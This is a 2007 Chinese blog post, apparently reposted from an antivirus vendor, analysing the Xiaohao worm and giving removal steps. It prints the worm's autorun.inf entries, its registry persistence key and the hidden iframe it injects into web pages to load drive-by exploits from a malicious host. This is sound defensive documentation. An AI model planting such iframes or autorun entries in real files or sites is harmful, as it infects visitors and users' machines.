2007/08/15 | 小浩蠕虫(xiaohao.exe)分析与解决方案
类别(网络风) | 评论(0) | 阅读(54) | 发表于 18:23

一、病毒描述:
  今日,DSW Lab Avert小组监测到一个具备较强破坏力的名为小浩的蠕虫病毒开始传播,该病毒类似此前曾肆虐网络的熊猫烧香病毒,破坏性感染系统文件,并在受害者系统上遍历网页/脚本文件,插入带毒的网址。因为病毒的破坏性感染行为,导致被感染文件无法修复,严重被感染系统无法使用,会导致用户无法开机现象。

         感染效果截图:
如果图片缩小请点击以放大查看

二、病毒基本情况:
          病毒名称:Worm.Win32.Xiaohao.a
          病毒别名:小浩
          病毒类型:蠕虫
          危害级别:4
          感染平台:Windows 平台
           编写语言:C/C++

  三、病毒行为:
           1、当病毒体在被感染的系统上激活后,会在磁盘跟目录释放autorun.inf等文件,感染U盘等移动设备:
              %DRIVE%\autorun.inf 文件属性:H
              %DRIVE%\Xiaohao.exe 文件属性:H

           2、同时在跟目录释放一个名为Jilu.txt文件,记录了相关感染文件列表。
           3、拷贝自身到系统目录下,全路径: %SystemRoot%\system32\exloroe.exe
           4、将自动加入到注册表启动项确保自身启动激活:

            键路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components
             键名:{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}
             键值:%SystemRoot%\system32\exloroe.exe

           5、将系统时间修改为2005年1月17日,会导致部分杀毒软件和其他正版软件因授权问题无法激活。
      
            6、全盘搜索扩展名为*.jsp、*.php、 *.aspx、 *.asp、 *.html、 *.htm的文件,向其中插入病毒网址。
               <iframe src=http://xiaohao.yona.biz/*.htm width=0 height=0></iframe>
               其中该恶意页面利用多个系统漏洞针对Windows 2000/XP/2003进行有针对性的挂马。

              恶意页面的代码截图:
如果图片缩小请点击以放大查看

其它行为:
               修改注册表使系统无法正常浏览隐藏文件,修改注册表劫持正常的EXE运行,使得运行一些文件会先运行蠕虫自身:
               HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWAL
               shell\Auto\command=Xiaohao.exe
               shellexecute=Xiaohao.exe
               open=Xiaohao.exe
             当用户打开感染的文件夹时,资源管理器标题会被修改成:已中毒 X14o-H4o's Virus

  四、解决方案
          1、超级巡警已经紧急升级,请广大用户升级到最新特征库来预防病毒。
          2、对于网页被感染的用户,可以使用超级巡警的垃圾清理功能来批量修复被感染的网页,具体功能垃圾清理→智能扫描→清除指定代码,勾选后填入病毒植入的恶意网页,点击扫描→清除即可。
          3、不要运行来历不明的文件。 

本文由超级巡警提供

0

评论Comments

日志分类
首页[930]
日记里[65]
网络风[752]
音乐香[16]
学习中[2]
其他类[95]